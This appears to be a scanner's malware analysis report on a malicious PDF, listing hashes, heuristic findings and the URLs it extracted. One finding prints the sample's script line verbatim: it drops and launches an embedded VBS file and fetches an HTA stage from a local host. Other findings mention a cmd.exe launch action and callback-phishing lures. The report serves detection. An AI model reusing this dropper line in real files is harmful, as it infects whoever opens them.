Malicious PDF — malware analysis report

Static analysis result for SHA-256 3d2e71ff11241c61…

MALICIOUS

PDF

7.24 MB Authoring application: PyPDF2 First seen: 2026-04-24
MD5: 5573feb0ff8b249f6f386b3f9bbc6a98 SHA-1: 7e9dfc2a2090442d222e47b69d1eb180ef58e7a0 SHA-256: 3d2e71ff11241c616561093ebb390bf79294b433447d98775f4bd67f2546fd5c
370 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9868

Heuristics 14

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • exportDataObject + nLaunch — embedded-file launch-on-open dropper critical PDF_JS_EXPORT_LAUNCH_DROPPER
    PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment. (identified after JavaScript deobfuscation)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCH
    Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.
    Matched line in script
    try{this.exportDataObject({cName:"stage.vbs",nLaunch:2});}catch(e1){}try{app.launchURL("http://localhost:3000/files/stage-1776798113.hta",true);}catch(e2){}
  • OpenAction trigger high PDF_OPENACTION
    PDF has an /OpenAction that launches, submits, or opens an external target
  • Launch action high PDF_LAUNCH
    PDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • /Launch action target: cmd\056exe high PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target.
  • Travel-support phone-number stuffing scam high SE_TRAVEL_SUPPORT_PHONE_SCAM
    Document repeats phone numbers in airline/travel/refund/support language, often across multiple regional phrasings. This matches SEO/support-scam PDFs that impersonate airlines or travel brands and route users to attacker-controlled call centers rather than a normal travel document.
  • Callback phishing phone lure medium SE_CALLBACK_LURE
    Document asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) or Microsoft license-boilerplate documents that carry no urgency or charge/dispute escalation.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • External URI low PDF_URI
    PDF contains an external URL action
  • PDF static-analysis soft budget exhausted low SCAN_INCOMPLETE
    The bounded PDF scanner skipped late sub-format walkers after the configured per-file soft deadline. Earlier findings remain valid.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.redteamsecure.com Referenced by PDF JavaScript
    • http://www.redteamsecure.com/labs/all_projectsReferenced by PDF JavaScript
    • http://dradisframework.org/Referenced by PDF JavaScript
    • http://keepnote.org/Referenced by PDF JavaScript
    • http://www.exploit-db/google-dorks/Referenced by PDF JavaScript
    • http://www.googleguide.com/advanced_operators_reference.htmlReferenced by PDF JavaScript
    • http://www.shodanhq.com/help/filtersReferenced by PDF JavaScript
    • http://www.shodanhq.com/helpReferenced by PDF JavaScript
    • http://www.unshredder.com/Referenced by PDF JavaScript
    • https://github.com/trustedsec/socialengineerReferenced by PDF JavaScript
    • http://www.paterva.com/web6/products/download2.phpReferenced by PDF JavaScript
    • http://www.proofpronto.com/gps-tracking-Referenced by PDF JavaScript
    • https://www.spoofcard.com/appsReferenced by PDF JavaScript
    • http://toool.us/Referenced by PDF JavaScript
    • http://acehackware.com/collections/Referenced by PDF JavaScript
    • https://searchwwwReferenced by PDF JavaScript
    • http://mblsportalReferenced by PDF JavaScript
    • http://dialabc.com/sound/detect/Referenced by PDF JavaScript
    • http://www.redteamsecure.com/Referenced by PDF JavaScript
    • http://www.brickhousesecurity.com/Referenced by PDF JavaScript
    • http://localhost:3000/files/stage-1776798113.htaReferenced by PDF JavaScript
    • http://facebook.com/redteamsecure/Referenced by PDF JavaScript
    • http://twitter.com/redteamsecure/Referenced by PDF JavaScript
    • http://www.linkedin.com/in/jtalamantes/Referenced by PDF JavaScript
    • http://www.facebook.com/redteamsecureReferenced by PDF JavaScript
    • http://twitter.com/redteamsecureReferenced by PDF JavaScript
    • http://books.google.com/books/Referenced by PDF JavaScript
    • http://money.cnn.com/2013/04/08/technology/security/shodan/Referenced by PDF JavaScript
    • http://www.whois.net/Referenced by PDF JavaScript
    • http://www.intelius.comReferenced by PDF JavaScript
    • http://www.ussearch.comReferenced by PDF JavaScript
    • http://www.peoplefinders.comReferenced by PDF JavaScript
    • http://www.kali.org/downloads/Referenced by PDF JavaScript
    • http://www.rapid7.com/products/metasploit/Referenced by PDF JavaScript
    • http://www.rapid7.com/products/metasploit/metasploit-pro-registration.jspReferenced by PDF JavaScript
    • http://www.newegg.com/Product/Product.aspxReferenced by PDF JavaScript
    • https://www.youtubeReferenced by PDF JavaScript
    • http://www.readspeaker.com/voice-demo/Referenced by PDF JavaScript
    • https://www.youtube.com/watchReferenced by PDF JavaScript